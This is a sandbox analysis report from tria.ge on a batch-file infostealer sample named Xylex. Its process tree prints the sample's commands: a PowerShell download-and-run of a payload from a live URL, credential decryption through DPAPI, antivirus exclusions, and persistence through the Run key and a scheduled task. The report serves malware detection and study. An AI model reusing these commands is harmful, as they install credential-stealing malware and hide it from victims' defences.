Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
142s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/06/2024, 04:13
Static task
static1
Behavioral task
behavioral1
Sample
Executor/Xylex.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Executor/Xylex.bat
Resource
win11-20240426-en
General
-
Target
Executor/Xylex.bat
-
Size
255B
-
MD5
aa385e3b4104f4529680f554cdc39b40
-
SHA1
00ab4c02495c60b0fce2ec3e6967b864e1156cae
-
SHA256
e0cf8ed28a7efbcb910b6e7d78641179e39a81fae787308eb6112745e59f1076
-
SHA512
ad06ece28950fa050775f899d0574c44ccf86912f465bd5e7c041b972173ef16a34a6857be8dfb1bd13163099d710b9fcf3c09a110f406e3a8608e71df16c66e
Malware Config
Extracted
https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 2628 powershell.exe 3 2628 powershell.exe 5 3232 curl.exe 13 4708 curl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2196 powershell.exe 3736 powershell.exe 4248 powershell.exe 1360 powershell.exe 5108 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 396 xylex.exe -
Loads dropped DLL 1 IoCs
pid Process 396 xylex.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\OyLwFgcPpobCkad.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2572 cmd.exe 2984 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3760 schtasks.exe -
Detects videocard installed 1 TTPs 12 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1696 WMIC.exe 1916 WMIC.exe 4720 WMIC.exe 1000 WMIC.exe 4692 WMIC.exe 1028 WMIC.exe 1960 WMIC.exe 4652 WMIC.exe 2980 WMIC.exe 2416 WMIC.exe 2640 WMIC.exe 428 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2932 tasklist.exe 4784 tasklist.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2948 reg.exe 2880 reg.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
pid Process 2628 powershell.exe 2628 powershell.exe 1360 powershell.exe 1360 powershell.exe 4108 powershell.exe 4108 powershell.exe 2372 powershell.exe 2372 powershell.exe 2196 powershell.exe 2196 powershell.exe 3736 powershell.exe 3736 powershell.exe 4868 powershell.exe 4868 powershell.exe 4248 powershell.exe 4248 powershell.exe 4788 powershell.exe 4788 powershell.exe 3776 powershell.exe 3776 powershell.exe 3460 powershell.exe 3460 powershell.exe 5108 powershell.exe 5108 powershell.exe 2080 powershell.exe 2080 powershell.exe 3692 powershell.exe 3692 powershell.exe 396 xylex.exe 396 xylex.exe 4592 powershell.exe 4592 powershell.exe 396 xylex.exe 320 powershell.exe 320 powershell.exe 2352 powershell.exe 2352 powershell.exe 2480 powershell.exe 2480 powershell.exe 376 powershell.exe 376 powershell.exe 4064 powershell.exe 4064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 2932 tasklist.exe Token: SeDebugPrivilege 4108 powershell.exe Token: SeDebugPrivilege 4784 tasklist.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 WMIC.exe Token: SeSecurityPrivilege 4324 WMIC.exe Token: SeTakeOwnershipPrivilege 4324 WMIC.exe Token: SeLoadDriverPrivilege 4324 WMIC.exe Token: SeSystemProfilePrivilege 4324 WMIC.exe Token: SeSystemtimePrivilege 4324 WMIC.exe Token: SeProfSingleProcessPrivilege 4324 WMIC.exe Token: SeIncBasePriorityPrivilege 4324 WMIC.exe Token: SeCreatePagefilePrivilege 4324 WMIC.exe Token: SeBackupPrivilege 4324 WMIC.exe Token: SeRestorePrivilege 4324 WMIC.exe Token: SeShutdownPrivilege 4324 WMIC.exe Token: SeDebugPrivilege 4324 WMIC.exe Token: SeSystemEnvironmentPrivilege 4324 WMIC.exe Token: SeRemoteShutdownPrivilege 4324 WMIC.exe Token: SeUndockPrivilege 4324 WMIC.exe Token: SeManageVolumePrivilege 4324 WMIC.exe Token: 33 4324 WMIC.exe Token: 34 4324 WMIC.exe Token: 35 4324 WMIC.exe Token: 36 4324 WMIC.exe Token: SeIncreaseQuotaPrivilege 4556 WMIC.exe Token: SeSecurityPrivilege 4556 WMIC.exe Token: SeTakeOwnershipPrivilege 4556 WMIC.exe Token: SeLoadDriverPrivilege 4556 WMIC.exe Token: SeSystemProfilePrivilege 4556 WMIC.exe Token: SeSystemtimePrivilege 4556 WMIC.exe Token: SeProfSingleProcessPrivilege 4556 WMIC.exe Token: SeIncBasePriorityPrivilege 4556 WMIC.exe Token: SeCreatePagefilePrivilege 4556 WMIC.exe Token: SeBackupPrivilege 4556 WMIC.exe Token: SeRestorePrivilege 4556 WMIC.exe Token: SeShutdownPrivilege 4556 WMIC.exe Token: SeDebugPrivilege 4556 WMIC.exe Token: SeSystemEnvironmentPrivilege 4556 WMIC.exe Token: SeRemoteShutdownPrivilege 4556 WMIC.exe Token: SeUndockPrivilege 4556 WMIC.exe Token: SeManageVolumePrivilege 4556 WMIC.exe Token: 33 4556 WMIC.exe Token: 34 4556 WMIC.exe Token: 35 4556 WMIC.exe Token: 36 4556 WMIC.exe Token: SeIncreaseQuotaPrivilege 4324 WMIC.exe Token: SeSecurityPrivilege 4324 WMIC.exe Token: SeTakeOwnershipPrivilege 4324 WMIC.exe Token: SeLoadDriverPrivilege 4324 WMIC.exe Token: SeSystemProfilePrivilege 4324 WMIC.exe Token: SeSystemtimePrivilege 4324 WMIC.exe Token: SeProfSingleProcessPrivilege 4324 WMIC.exe Token: SeIncBasePriorityPrivilege 4324 WMIC.exe Token: SeCreatePagefilePrivilege 4324 WMIC.exe Token: SeBackupPrivilege 4324 WMIC.exe Token: SeRestorePrivilege 4324 WMIC.exe Token: SeShutdownPrivilege 4324 WMIC.exe Token: SeDebugPrivilege 4324 WMIC.exe Token: SeSystemEnvironmentPrivilege 4324 WMIC.exe Token: SeRemoteShutdownPrivilege 4324 WMIC.exe Token: SeUndockPrivilege 4324 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2480 wrote to memory of 2628 2480 cmd.exe 77 PID 2480 wrote to memory of 2628 2480 cmd.exe 77 PID 2628 wrote to memory of 396 2628 powershell.exe 78 PID 2628 wrote to memory of 396 2628 powershell.exe 78 PID 396 wrote to memory of 1168 396 xylex.exe 82 PID 396 wrote to memory of 1168 396 xylex.exe 82 PID 1168 wrote to memory of 484 1168 cmd.exe 83 PID 1168 wrote to memory of 484 1168 cmd.exe 83 PID 1168 wrote to memory of 1360 1168 cmd.exe 84 PID 1168 wrote to memory of 1360 1168 cmd.exe 84 PID 1360 wrote to memory of 1184 1360 powershell.exe 85 PID 1360 wrote to memory of 1184 1360 powershell.exe 85 PID 1184 wrote to memory of 1960 1184 csc.exe 86 PID 1184 wrote to memory of 1960 1184 csc.exe 86 PID 396 wrote to memory of 5004 396 xylex.exe 87 PID 396 wrote to memory of 5004 396 xylex.exe 87 PID 5004 wrote to memory of 3232 5004 cmd.exe 144 PID 5004 wrote to memory of 3232 5004 cmd.exe 144 PID 396 wrote to memory of 1116 396 xylex.exe 89 PID 396 wrote to memory of 1116 396 xylex.exe 89 PID 1116 wrote to memory of 2932 1116 cmd.exe 133 PID 1116 wrote to memory of 2932 1116 cmd.exe 133 PID 396 wrote to memory of 320 396 xylex.exe 92 PID 396 wrote to memory of 320 396 xylex.exe 92 PID 396 wrote to memory of 2572 396 xylex.exe 93 PID 396 wrote to memory of 2572 396 xylex.exe 93 PID 320 wrote to memory of 4784 320 cmd.exe 94 PID 320 wrote to memory of 4784 320 cmd.exe 94 PID 2572 wrote to memory of 4108 2572 cmd.exe 142 PID 2572 wrote to memory of 4108 2572 cmd.exe 142 PID 396 wrote to memory of 2984 396 xylex.exe 96 PID 396 wrote to memory of 2984 396 xylex.exe 96 PID 2984 wrote to memory of 2372 2984 cmd.exe 97 PID 2984 wrote to memory of 2372 2984 cmd.exe 97 PID 396 wrote to memory of 2936 396 xylex.exe 98 PID 396 wrote to memory of 2936 396 xylex.exe 98 PID 396 wrote to memory of 1380 396 xylex.exe 99 PID 396 wrote to memory of 1380 396 xylex.exe 99 PID 396 wrote to memory of 1900 396 xylex.exe 100 PID 396 wrote to memory of 1900 396 xylex.exe 100 PID 2936 wrote to memory of 4324 2936 cmd.exe 101 PID 2936 wrote to memory of 4324 2936 cmd.exe 101 PID 396 wrote to memory of 452 396 xylex.exe 102 PID 396 wrote to memory of 452 396 xylex.exe 102 PID 1380 wrote to memory of 428 1380 cmd.exe 148 PID 1380 wrote to memory of 428 1380 cmd.exe 148 PID 396 wrote to memory of 4388 396 xylex.exe 104 PID 396 wrote to memory of 4388 396 xylex.exe 104 PID 1900 wrote to memory of 3760 1900 cmd.exe 105 PID 1900 wrote to memory of 3760 1900 cmd.exe 105 PID 452 wrote to memory of 2196 452 cmd.exe 106 PID 452 wrote to memory of 2196 452 cmd.exe 106 PID 4388 wrote to memory of 4556 4388 cmd.exe 107 PID 4388 wrote to memory of 4556 4388 cmd.exe 107 PID 396 wrote to memory of 5060 396 xylex.exe 108 PID 396 wrote to memory of 5060 396 xylex.exe 108 PID 5060 wrote to memory of 2484 5060 cmd.exe 109 PID 5060 wrote to memory of 2484 5060 cmd.exe 109 PID 396 wrote to memory of 4344 396 xylex.exe 110 PID 396 wrote to memory of 4344 396 xylex.exe 110 PID 396 wrote to memory of 1716 396 xylex.exe 111 PID 396 wrote to memory of 1716 396 xylex.exe 111 PID 4344 wrote to memory of 2492 4344 cmd.exe 112 PID 4344 wrote to memory of 2492 4344 cmd.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"4⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "5⤵PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\CSC7912D2EB102E469BAB2DA46F11C232B8.TMP"7⤵PID:1960
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵
- Blocklisted process makes network request
PID:3232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"4⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f5⤵PID:428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM5⤵
- Creates scheduled task(s)
PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.cmdline"6⤵PID:380
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\jrtvppjd\CSC9833EEABE32E432F97135D1DABD333AC.TMP"7⤵PID:4920
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""4⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"5⤵PID:2484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "6⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4248
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:2948
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"7⤵
- Modifies registry key
PID:2880
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE7⤵PID:3304
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber5⤵PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:1716
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:3424
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"4⤵PID:2480
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid5⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:2772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"4⤵PID:2972
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID5⤵PID:3120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"4⤵PID:484
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber5⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:772
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"4⤵PID:2932
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"4⤵PID:3956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid5⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:5032
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:3108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"4⤵PID:4108
-
C:\Windows\system32\getmac.exegetmac /NH5⤵PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:3232
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:4320
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:428
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:3552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:3124
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:4596
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:4872
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:3088
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:1192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:3712
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2980
-
-
-
